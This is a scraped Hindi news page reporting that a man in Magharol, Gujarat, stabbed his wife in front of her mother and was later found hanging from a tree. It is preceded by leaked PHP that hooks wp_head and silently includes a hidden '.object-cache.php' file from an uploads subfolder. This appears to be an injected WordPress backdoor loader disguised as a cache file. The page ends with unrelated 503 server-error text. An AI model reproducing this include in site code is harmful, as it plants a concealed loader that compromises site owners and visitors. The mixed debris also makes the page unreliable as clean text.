add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मघरोल में पत्नी की चाकू से हत्या कर फरार पति का शव पेड़ से लटका मिला, पत्नी के मायके जाने से नाराज था – SOCH INDIA
Menu

देश
मघरोल में पत्नी की चाकू से हत्या कर फरार पति का शव पेड़ से लटका मिला, पत्नी के मायके जाने से नाराज था

nobanner

आणंद के सोजित्रा तालुका के मघरोल में सास के सामने ही पत्नी की हत्या करने वाले पति ने अपने आप को फांसी लगाकर आत्महत्या करने के बाद सनसनी फैल गई है। पत्नी की हत्या कर फरार हुए पति का शव एक पेड़ से लटकते हालत में बरामद होने के बाद इसकी सूचना तुरंत पुलिस को दी गई। सूचना पाते ही स्थल पहुंची पुलिस ने अनुमान लगाया है कि पुलिस गिरफ्तारी के डर से भयभीत पति ने आत्महत्या की है।

घरवालों की मर्जी के खिलाफ की थी लव मैरिज
फिलहाल पुलिस ने अकस्मात का केस दर्ज कर जांच शुरू कर दी है। जानकारी के अनुसार सोजित्रा के मघरोल गांव में रहने वाली भारतीबेन ने 2004 में गांव के निवासी भरत जेठा रोहित के साथ प्रेमविवाह कर दूसरे गांव में स्थायी हुए थे। इस प्रेमविवाह से नाराज भारतीबेन के माता-पिता शुरूआत में उन्हें बुलाते नहीं थे, लेकिन 2008 में उसके पिता का निधन हो जाने के बाद भारतीबेन समय समय पर मायके आती थी।

हत्या के बाद भाग निकला था
इस दौरान भरत को शराब की आदत होने के कारण वह हमेशा उसे पीटता था, जिससे परेशान होकर भारतीबेन मायके रहने आ गई थी। जिससे नाराज भरत सोमवार को ससुराल पहुंचा और सास के सामने ही भारतीबेन पर चाकू से हमला कर उसकी हत्या कर दी। इसके बाद भरत फरार हो गया था।

आशंका: गिरफ्तारी से बचने के लिए आत्महत्या की
देर रात एक पेड़ से लटका हुआ भरत का शव बरामद होने के बाद सरपंच ने इसकी सूचना पुलिस को दी। सूचना पाते ही पुलिस ने स्थल पर पहुंचकर शव को कब्जे में लेते हुए पीएम के लिए रवाना किया। बता दें कि मघरोल निवासी काशीबेन की 6 बेटियों में सबसे छोटी भारतीबेन (38) को अपने वैवाहिक जीवन में एक बेटी और एक बेटे को जन्म दिया था।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.